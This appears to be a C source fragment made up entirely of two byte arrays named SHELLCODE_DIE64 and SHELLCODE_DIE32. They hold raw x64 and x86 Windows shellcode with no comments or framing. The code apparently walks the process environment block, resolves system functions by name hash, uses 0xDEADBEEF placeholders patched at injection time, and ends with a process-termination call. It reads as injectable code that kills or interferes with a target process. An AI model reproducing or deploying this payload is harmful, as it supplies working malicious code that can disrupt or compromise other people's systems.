unsigned char SHELLCODE_DIE64[] = {
	64,85,83,86,87,65,84,65,85,65,86,65,87,72,141,108,
	36,225,72,129,236,168,0,0,0,51,192,72,137,69,231,68,
	139,248,137,69,111,68,139,208,72,137,69,207,68,139,232,72,
	137,69,127,139,208,72,137,69,199,68,139,216,72,137,69,215,
	139,248,68,139,192,72,137,69,239,68,139,224,139,216,101,72,
	139,4,37,96,0,0,0,72,139,72,24,72,139,65,32,72,
	139,8,101,72,139,4,37,96,0,0,0,76,139,73,32,72,
	139,72,48,184,77,90,0,0,72,137,77,255,102,65,57,1,
	15,133,156,4,0,0,73,99,65,60,66,129,60,8,80,69,
	0,0,15,133,138,4,0,0,66,139,132,8,136,0,0,0,
	33,85,103,73,3,193,139,72,28,139,112,32,73,3,201,68,
	139,112,36,73,3,241,139,64,20,77,3,241,72,137,77,223,
	137,69,119,133,192,15,132,87,4,0,0,72,139,69,127,72,
	133,192,116,49,77,133,228,116,44,77,133,237,116,39,77,133,
	255,116,34,72,133,210,116,29,77,133,219,116,24,77,133,210,
	116,19,72,133,255,116,14,72,133,219,116,9,77,133,192,15,
	133,211,1,0,0,68,139,22,77,3,209,65,138,18,132,210,
	15,132,47,1,0,0,65,15,183,6,68,139,4,129,77,3,
	193,51,201,68,141,89,1,15,190,194,73,255,194,68,3,216,
	184,113,128,7,128,65,247,227,193,234,15,105,194,241,255,0,
	0,68,43,216,184,113,128,7,128,65,3,203,247,225,193,234,
	15,105,194,241,255,0,0,65,138,18,43,200,132,210,117,199,
	193,225,16,184,181,6,163,59,65,11,203,59,200,119,123,116,
	116,129,249,185,2,120,10,116,99,129,249,213,3,198,20,116,
	70,129,249,78,4,172,25,116,57,76,139,93,215,129,249,150,
	4,73,29,116,36,72,139,85,199,129,249,214,5,113,46,72,
	139,77,223,76,139,85,207,72,139,69,127,15,133,156,0,0,
	0,73,139,248,233,148,0,0,0,76,137,69,127,73,139,192,
	235,127,77,139,232,235,114,76,139,93,215,73,139,208,72,139,
	77,223,72,139,69,127,72,137,85,199,235,109,77,139,216,76,
	137,69,215,235,88,73,139,216,235,79,129,249,75,7,249,67,
	116,68,129,249,56,8,75,89,116,54,72,139,85,199,76,139,
	93,215,72,139,69,127,129,249,223,8,154,101,116,21,76,139,
	85,207,129,249,62,10,66,131,72,139,77,223,117,47,77,139,
	248,235,42,72,139,77,223,77,139,208,76,137,69,207,235,29,
	76,137,69,239,235,3,77,139,224,76,139,93,215,72,139,69,
	127,72,139,77,223,72,139,85,199,76,139,85,207,68,139,69,
	119,72,131,198,4,255,69,103,73,131,198,2,68,57,69,103,
	76,139,69,239,15,130,97,254,255,255,76,137,85,207,72,137,
	69,127,72,137,85,199,76,137,93,215,76,137,69,239,72,133,
	192,15,132,155,2,0,0,77,133,228,15,132,146,2,0,0,
	77,133,237,15,132,137,2,0,0,77,133,255,15,132,128,2,
	0,0,72,133,210,15,132,119,2,0,0,77,133,219,15,132,
	110,2,0,0,77,133,210,15,132,101,2,0,0,72,133,255,
	15,132,92,2,0,0,72,133,219,15,132,83,2,0,0,77,
	133,192,15,132,74,2,0,0,72,131,200,255,199,68,36,48,
	4,0,0,0,131,100,36,40,0,76,141,77,15,76,139,192,
	199,68,36,32,1,0,0,0,72,139,208,72,185,237,254,173,
	222,237,254,173,222,255,211,133,192,15,136,19,2,0,0,72,
	139,93,255,65,190,8,0,0,0,65,139,214,72,139,203,65,
	184,64,1,0,0,255,215,65,184,0,16,0,0,65,139,214,
	72,139,203,72,139,240,255,215,186,8,0,0,0,65,184,0,
	2,0,0,72,139,203,76,139,240,255,215,72,137,69,7,77,
	133,246,15,132,202,1,0,0,72,133,192,15,132,193,1,0,
	0,72,133,246,15,132,184,1,0,0,72,141,69,111,65,185,
	64,1,0,0,76,139,198,72,137,68,36,32,186,27,0,0,
	0,72,185,237,254,173,222,237,254,173,222,65,255,215,133,192,
	15,136,140,1,0,0,186,8,0,0,0,72,139,203,68,141,
	66,40,255,215,72,139,77,255,186,8,0,0,0,72,139,216,
	68,141,66,8,255,215,72,139,248,51,192,72,133,219,15,132,
	94,1,0,0,72,133,255,15,132,85,1,0,0,72,137,115,
	16,76,139,198,72,137,67,8,72,190,237,254,173,222,237,254,
	173,222,137,67,24,72,139,206,72,137,67,32,65,185,64,1,
	0,0,72,137,67,40,186,27,0,0,0,72,141,69,111,199,
	3,48,0,0,0,72,137,68,36,32,65,255,215,133,192,15,
	136,13,1,0,0,72,139,77,15,51,210,65,255,212,133,192,
	15,136,252,0,0,0,69,51,192,51,210,72,139,206,255,85,
	239,133,192,15,136,233,0,0,0,199,68,36,40,64,0,0,
	0,72,141,77,231,76,139,207,199,68,36,32,7,0,0,0,
	76,139,195,186,0,0,0,16,255,85,199,133,192,15,136,191,
	0,0,0,72,139,77,231,76,141,69,7,65,185,0,2,0,
	0,199,68,36,32,5,0,0,0,72,139,215,255,85,207,133,
	192,15,136,155,0,0,0,72,139,69,7,51,201,72,137,77,
	247,72,133,192,126,118,65,191,0,16,0,0,72,131,100,36,
	64,0,72,141,176,0,240,255,255,69,51,201,69,51,192,51,
	210,72,133,246,120,56,72,139,77,231,72,141,69,247,72,137,
	68,36,56,68,137,124,36,48,76,137,116,36,40,72,137,124,
	36,32,65,255,213,133,192,121,7,61,3,1,0,0,117,44,
	76,1,125,247,72,139,198,72,133,246,127,176,235,30,72,141,
	77,247,72,137,76,36,56,72,139,77,231,137,68,36,48,76,
	137,116,36,40,72,137,124,36,32,65,255,213,72,139,77,231,
	255,85,215,72,139,203,255,85,127,51,210,72,131,201,255,65,
	255,212,72,129,196,168,0,0,0,65,95,65,94,65,93,65,
	92,95,94,91,93,195
};

unsigned char SHELLCODE_DIE32[] = {
	85,139,236,131,236,104,51,192,137,69,216,139,200,137,69,196,
	137,69,228,137,69,240,137,69,212,137,69,232,137,69,224,137,
	69,236,137,69,244,83,139,216,137,77,252,86,139,240,137,93,
	204,100,161,48,0,0,0,87,137,117,248,139,64,12,139,64,
	20,139,0,139,120,16,100,161,48,0,0,0,137,125,200,139,
	64,24,137,69,208,184,77,90,0,0,102,57,7,15,133,209,
	3,0,0,139,71,60,129,60,56,80,69,0,0,15,133,193,
	3,0,0,139,68,56,120,33,77,220,3,199,139,80,28,3,
	215,137,85,184,139,80,32,3,215,137,85,192,139,80,36,139,
	64,20,3,215,137,85,188,139,209,137,69,172,133,192,15,132,
	144,3,0,0,131,125,212,0,116,50,133,246,116,46,131,125,
	240,0,116,40,133,201,116,36,131,125,232,0,116,30,131,125,
	224,0,116,24,131,125,228,0,116,18,133,219,116,14,133,210,
	116,10,131,125,236,0,15,133,143,1,0,0,139,85,192,139,
	69,220,139,4,130,3,199,137,69,180,138,16,132,210,15,132,
	230,0,0,0,139,77,188,187,241,255,0,0,139,69,220,15,
	183,4,65,139,77,184,139,52,129,3,247,139,125,180,137,117,
	176,51,246,70,51,201,15,190,194,51,210,3,198,247,243,139,
	242,51,210,141,4,49,247,243,71,139,202,138,23,132,210,117,
	229,139,93,204,184,181,6,163,59,193,225,16,11,206,139,117,
	176,59,200,119,88,116,76,129,249,185,2,120,10,116,63,129,
	249,213,3,198,20,116,50,129,249,78,4,172,25,116,37,129,
	249,150,4,73,29,116,21,139,85,244,129,249,214,5,113,46,
	139,77,252,117,80,139,222,137,93,204,235,73,137,117,212,139,
	117,248,235,83,137,117,240,235,246,137,117,232,235,241,137,117,
	224,235,236,139,214,137,85,244,139,77,252,235,40,129,249,75,
	7,249,67,116,47,129,249,56,8,75,89,116,34,129,249,223,
	8,154,101,116,21,139,85,244,129,249,62,10,66,131,117,216,
	139,206,137,77,252,139,117,248,235,19,137,117,228,235,176,137,
	117,236,235,171,137,117,248,139,77,252,139,85,244,255,69,220,
	139,125,172,57,125,220,139,69,212,139,125,200,15,130,178,254,
	255,255,139,125,228,137,125,228,139,125,240,137,125,240,139,125,
	232,137,125,232,139,125,224,137,125,224,139,125,236,137,77,252,
	137,69,212,137,125,236,137,117,248,133,192,15,132,19,2,0,
	0,133,246,15,132,11,2,0,0,131,125,240,0,15,132,1,
	2,0,0,133,201,15,132,249,1,0,0,131,125,232,0,15,
	132,239,1,0,0,131,125,224,0,15,132,229,1,0,0,131,
	125,228,0,15,132,219,1,0,0,133,219,15,132,211,1,0,
	0,133,210,15,132,203,1,0,0,235,3,139,125,236,133,255,
	15,132,190,1,0,0,106,4,106,0,106,1,141,69,168,80,
	106,255,106,255,104,237,254,173,222,255,210,133,192,15,136,161,
	1,0,0,139,117,208,104,64,1,0,0,106,8,86,255,211,
	104,0,16,0,0,106,8,86,139,248,255,211,104,0,2,0,
	0,106,8,255,117,208,139,240,137,117,200,255,211,137,69,152,
	133,246,15,132,108,1,0,0,133,192,15,132,100,1,0,0,
	133,255,15,132,92,1,0,0,141,69,196,80,104,64,1,0,
	0,87,106,27,104,237,254,173,222,255,85,252,133,192,15,136,
	64,1,0,0,106,24,106,8,255,117,208,255,211,106,8,106,
	8,255,117,208,139,240,255,211,139,216,137,93,204,133,246,15,
	132,31,1,0,0,133,219,15,132,23,1,0,0,51,192,199,
	6,24,0,0,0,137,70,4,137,70,12,137,70,16,137,70,
	20,141,69,196,80,104,64,1,0,0,87,106,27,104,237,254,
	173,222,137,126,8,255,85,252,133,192,15,136,228,0,0,0,
	51,255,87,255,117,168,255,85,248,133,192,15,136,211,0,0,
	0,87,87,104,237,254,173,222,255,85,236,133,192,15,136,193,
	0,0,0,106,64,106,7,83,86,104,0,0,0,16,141,69,
	216,80,255,85,232,133,192,15,136,167,0,0,0,106,5,104,
	0,2,0,0,141,69,152,80,83,255,117,216,255,85,228,133,
	192,15,136,141,0,0,0,139,125,156,51,210,139,69,152,137,
	85,160,137,85,164,59,250,124,106,127,4,59,194,118,100,185,
	0,16,0,0,139,216,43,217,27,250,120,66,127,4,59,218,
	114,60,82,141,69,160,80,81,255,117,200,255,117,204,82,82,
	82,255,117,216,255,85,240,133,192,121,7,61,3,1,0,0,
	117,49,185,0,16,0,0,139,195,1,77,160,106,0,90,17,
	85,164,59,250,127,190,124,27,59,194,119,184,235,21,82,141,
	77,160,81,80,255,117,200,255,117,204,82,82,82,255,117,216,
	255,85,240,255,117,216,255,85,224,86,255,85,212,106,0,106,
	255,255,85,248,95,94,91,201,195
};
